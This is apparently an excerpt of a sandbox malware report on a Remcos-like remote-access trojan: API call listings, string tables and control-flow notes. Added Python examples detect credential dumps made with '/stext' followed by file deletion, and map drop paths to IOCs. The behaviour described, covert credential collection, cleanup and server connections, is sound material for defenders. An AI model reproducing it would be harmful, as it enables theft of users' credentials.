                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                                • String ID: | $%I64u$5.1.1 Pro$8SG$@u4$@z4$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-4CT19T$TLS Off$TLS On $dMG$hlight$name$p54$34$NG$NG
                                                                                • API String ID: 524882891-2637223880
                                                                                • Opcode ID: 789394b93ee2d4258008b9022465b51eafac81063400420677acc8a61a485141
                                                                                • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                                • Opcode Fuzzy Hash: 789394b93ee2d4258008b9022465b51eafac81063400420677acc8a61a485141
                                                                                • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                                                Control-flow Graph
                                                                                (rendered graph omitted; the Executed / Not Executed colouring is not recoverable from text)
                                                                                • Function 00412AEF: basic blocks span 412aef-413267
                                                                                • API call sites on the graph: GetModuleFileNameW (412aef), Sleep (5 sites, 412c58-412ecd), DeleteFileW (3 sites, 412df1-412e61)
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63881986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                • String ID: /stext "$0TG$0TG$NG$NG
                                                                                • API String ID: 1223786279-2576077980
                                                                                • Opcode ID: 9652fc645b0b5fb630b9200ff10863c4facc191bf55e184344104a03025868ea
                                                                                • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                                • Opcode Fuzzy Hash: 9652fc645b0b5fb630b9200ff10863c4facc191bf55e184344104a03025868ea
                                                                                • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
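
Reading the API list together with the string table: the routine fetches its own module path (GetModuleFileNameW), runs three Sleep(10 ms) polling loops, deletes three files (DeleteFileW), waits 500 ms and 100 ms, and finishes in a routine that calls send. The string `/stext "` in the same function is the save-to-text-file switch of the NirSoft password-recovery utilities; tying the string to those tools is an inference made here, not something the report states. Put together the pattern is: launch a helper with `/stext <file>`, wait for the output file, read it, delete it, send the contents. The Python below is an added detection example over constructed Sysmon-like events, not code from the report or from the sample. It correlates a `/stext` process creation with a later deletion of that output file by the launching process; the RegAsm.exe parent mirrors the process this memory dump was taken from, and every path, PID, timestamp and field name is invented for the example.

```python
import re
from datetime import datetime

# "/stext <file>" is the save-to-text-file switch of the NirSoft recovery utilities.
# Linking the string in this routine to those tools is an inference made for this
# example; the report only shows the string.
STEXT_RE = re.compile(r'/stext\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)

# Constructed Sysmon-like events with simplified field names: id 1 = process create,
# id 23 = file delete. The RegAsm.exe parent mirrors the process the dump above came
# from; every path, PID and timestamp here is invented.
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
TEMP = r"C:\Users\alice\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"id": 1, "ts": "2024-08-23T10:00:00.000Z", "pid": 4120, "ppid": 3988,
     "image": TEMP + r"\a1b2.exe", "parent_image": REGASM,
     "cmdline": f'"{TEMP}\\a1b2.exe" /stext "{TEMP}\\out1.txt"'},
    {"id": 1, "ts": "2024-08-23T10:00:00.050Z", "pid": 4124, "ppid": 3988,
     "image": TEMP + r"\c3d4.exe", "parent_image": REGASM,
     "cmdline": f'"{TEMP}\\c3d4.exe" /stext {TEMP}\\out2.txt'},
    {"id": 1, "ts": "2024-08-23T10:00:00.100Z", "pid": 5000, "ppid": 1234,
     "image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
    {"id": 23, "ts": "2024-08-23T10:00:00.600Z", "pid": 3988, "image": REGASM,
     "target": TEMP + r"\out1.txt"},
    {"id": 23, "ts": "2024-08-23T10:00:00.620Z", "pid": 3988, "image": REGASM,
     "target": TEMP + r"\out2.txt"},
    {"id": 23, "ts": "2024-08-23T10:00:01.000Z", "pid": 3988, "image": REGASM,
     "target": TEMP + r"\unrelated.tmp"},
    {"id": 1, "ts": "2024-08-23T10:00:01.200Z", "pid": 4130, "ppid": 3988,
     "image": TEMP + r"\e5f6.exe", "parent_image": REGASM,
     "cmdline": f'"{TEMP}\\e5f6.exe" /stext "{TEMP}\\out3.txt"'},
]


def _ts(value):
    # Sysmon UtcTime exported as ISO-8601 with a trailing Z.
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def _norm(path):
    return path.strip().strip('"').lower()


def detect_stext_dump(events):
    """Correlate '/stext <out>' process creations with later deletion of <out>.

    Strong alert: the launching process itself deletes the output, which is the
    collect-then-clean-up loop seen in the routine above. Weak alert: a dump whose
    output was never seen deleted. Returns one alert dict per dumped file.
    """
    pending = {}  # normalised output path -> dump details awaiting the delete
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["id"] == 1:
            match = STEXT_RE.search(ev.get("cmdline", ""))
            if not match:
                continue
            out = match.group(1) or match.group(2)
            pending[_norm(out)] = {
                "parent": ev["parent_image"], "parent_pid": ev["ppid"],
                "tool": ev["image"], "output": out, "dump_ts": _ts(ev["ts"]),
                "deleted_after_s": None, "stage": "dump_only",
            }
        elif ev["id"] == 23:
            hit = pending.pop(_norm(ev["target"]), None)
            if hit is None:
                continue
            if ev["pid"] == hit["parent_pid"]:
                hit["deleted_after_s"] = (_ts(ev["ts"]) - hit["dump_ts"]).total_seconds()
                hit["stage"] = "output_deleted_by_parent"
            else:
                hit["stage"] = "output_deleted_by_other"
            alerts.append(hit)
    alerts.extend(pending.values())  # dumps with no clean-up observed
    return alerts


def run_sample():
    return detect_stext_dump(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert["stage"], alert["parent"], "->", alert["tool"], alert["output"],
              alert["deleted_after_s"])
```

The weak alert (`dump_only`) covers a tool that wrote output without the parent cleaning up; the strong one requires the launcher itself to delete the file, which is what the three DeleteFileW sites above do. A production rule should additionally exclude interactive shells as the parent, because administrators do run these utilities by hand.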

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                  • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                • API String ID: 672098462-2938083778
                                                                                • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered image; node list not reproduced): basic blocks 0x414dc1-0x414f23. Imports reached: GetSystemDirectoryA, LoadLibraryA, GetProcAddress, FreeLibrary. Internal routines called: 0x441a8e, 0x441ae8.
                                                                                APIs
                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                • API String ID: 2490988753-744132762
                                                                                • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                                • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered image; node list not reproduced): basic blocks 0x4048c8-0x404a9e. Imports reached: connect, WSAGetLastError, CreateEventW. Internal routines called: 0x40531e, 0x402093, 0x41b580, 0x420cf1, 0x420f20, 0x41cb72, 0x4052fd, 0x401fd8, 0x421ad1, 0x420d31, 0x420e97, 0x421143.
                                                                                APIs
                                                                                • connect.WS2_32(FFFFFFFF,00C24830,00000010), ref: 004048E0
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                • API String ID: 994465650-2151626615
                                                                                • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                                • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                • String ID:
                                                                                • API String ID: 3658366068-0
                                                                                • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered image; node list not reproduced): basic blocks 0x40da6f-0x40dc56, with a multi-way branch at 0x40da9a. Imports reached: GetLongPathNameW. Internal routines called: 0x401f86, 0x401f04, 0x40417e, 0x40de0c, 0x402fa5, 0x401f09, 0x41c048, 0x41b645, 0x401f13, 0x43c11f, 0x409092.
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: LongNamePath
                                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                • API String ID: 82841172-425784914
                                                                                • Opcode ID: dcd1128b7a106c79bca106c67d8098b9e866a23ab1c383420f4c9685f235a15f
                                                                                • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                • Opcode Fuzzy Hash: dcd1128b7a106c79bca106c67d8098b9e866a23ab1c383420f4c9685f235a15f
                                                                                • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
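
The graph of this routine fans out at 0x40da9a into a set of cases that converge on 0x40dbae and 0x409092; one case (0x40dae0) first calls 0x41c048, which the subcall listing for the next function shows wrapping GetCurrentProcess and IsWow64Process, then takes one of two parallel paths, and the whole thing ends in GetLongPathNameW. Read with the string table (AppData, ProgramData, ProgramFiles, SystemDrive, Temp, UserProfile, WinDir, plus \SysWOW64 and \system32), this is the install-folder resolver: a configured selector picks a well-known folder, and the system directory becomes SysWOW64 or system32 depending on whether the 32-bit body runs under WOW64. The Python below is an added model of that resolution plus the reverse mapping an analyst needs to turn an observed drop path into a host-independent IOC. It is not the report's or the sample's code; the numeric selector values, the "System" token name and the environment values are assumptions, and the sample paths are constructed.

```python
# Constructed environment of a hypothetical 64-bit host; the values are illustrative.
SAMPLE_ENV = {
    "AppData": r"C:\Users\alice\AppData\Roaming",
    "ProgramData": r"C:\ProgramData",
    "ProgramFiles": r"C:\Program Files",
    "SystemDrive": "C:",
    "Temp": r"C:\Users\alice\AppData\Local\Temp",
    "UserProfile": r"C:\Users\alice",
    "WinDir": r"C:\Windows",
}

# Selector -> folder. The names are the routine's string table; the numeric values and
# the "System" token are assumptions (the branch at 0x40da9a carries no labels).
FOLDER_SELECTORS = {
    0: "AppData",
    1: "ProgramData",
    2: "ProgramFiles",
    3: "SystemDrive",
    4: "Temp",
    5: "UserProfile",
    6: "WinDir",
    7: "System",  # WinDir + \SysWOW64 or \system32, decided by IsWow64Process
}


def _join(*parts):
    # Windows-style join that also copes with a bare drive such as "C:".
    return "\\".join(p.strip("\\") for p in parts if p)


def resolve_base_folder(selector, env, is_wow64):
    """Base folder for a selector, following the routine's dispatch.

    is_wow64 models IsWow64Process(): a 32-bit body on 64-bit Windows resolves the
    system directory to SysWOW64, the directory it actually sees through redirection.
    """
    name = FOLDER_SELECTORS.get(selector)
    if name is None:
        raise ValueError(f"unknown folder selector {selector}")
    if name == "System":
        return _join(env["WinDir"], "SysWOW64" if is_wow64 else "system32")
    return env[name]


def build_install_path(selector, subdir, filename, env, is_wow64):
    """Drop path as the sample would assemble it: base folder, optional subdir, file."""
    return _join(resolve_base_folder(selector, env, is_wow64), subdir, filename)


def tokenize_path(path, env, is_wow64):
    """Rewrite an observed absolute path into %Token% form for a host-independent IOC.

    The longest matching base wins, so a file under AppData reports as %AppData%
    rather than %UserProfile% or %SystemDrive%. Comparison is case-insensitive,
    matching the GetLongPathNameW-canonicalised form the routine works with.
    Unmatched paths are returned unchanged.
    """
    bases = [(resolve_base_folder(sel, env, is_wow64).rstrip("\\"), name)
             for sel, name in FOLDER_SELECTORS.items()]
    bases.sort(key=lambda b: len(b[0]), reverse=True)
    low = path.lower()
    for base, name in bases:
        b = base.lower()
        if low == b or low.startswith(b + "\\"):
            return "%" + name + "%" + path[len(b):]
    return path


if __name__ == "__main__":
    drop = build_install_path(0, "Remcos", "dropped.exe", SAMPLE_ENV, is_wow64=True)
    print(drop)
    print(tokenize_path(drop, SAMPLE_ENV, is_wow64=True))
    print(tokenize_path(r"C:\Windows\SysWOW64\dropped.exe", SAMPLE_ENV, is_wow64=True))
    print(tokenize_path(r"C:\Windows\SysWOW64\dropped.exe", SAMPLE_ENV, is_wow64=False))
```

Because the routine canonicalises with GetLongPathNameW, compare on long-form paths (no 8.3 short names) and case-insensitively, as tokenize_path does. The same SysWOW64 path tokenizes differently with is_wow64 True and False, which is exactly the ambiguity an IOC written as a literal C:\Windows\... path carries across 32-bit and 64-bit hosts.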

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered image; node list not reproduced): basic blocks 0x41b354-0x41b410. Imports reached: StrToIntA. Internal routines called: 0x41c048, 0x4135e1, 0x401fe2, 0x401fd8, 0x406b1c, 0x401fab, 0x41cffa, 0x40537d.
                                                                                APIs
                                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$p54
                                                                                • API String ID: 782494840-3726100942
                                                                                • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                                • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered image; node list not reproduced): basic blocks 0x44acc9-0x44aee4. Imports reached: MultiByteToWideChar, WideCharToMultiByte. Internal routines called: 0x4467e6, 0x43502b, 0x457210, 0x4461b8, 0x448c33, 0x435ecd.
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                • __freea.LIBCMT ref: 0044AEB0
                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                • __freea.LIBCMT ref: 0044AEB9
                                                                                • __freea.LIBCMT ref: 0044AEDE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 3864826663-0
                                                                                • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                • __freea.LIBCMT ref: 10008A08
                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                • __freea.LIBCMT ref: 10008A11
                                                                                • __freea.LIBCMT ref: 10008A36
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1414292761-0
                                                                                • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
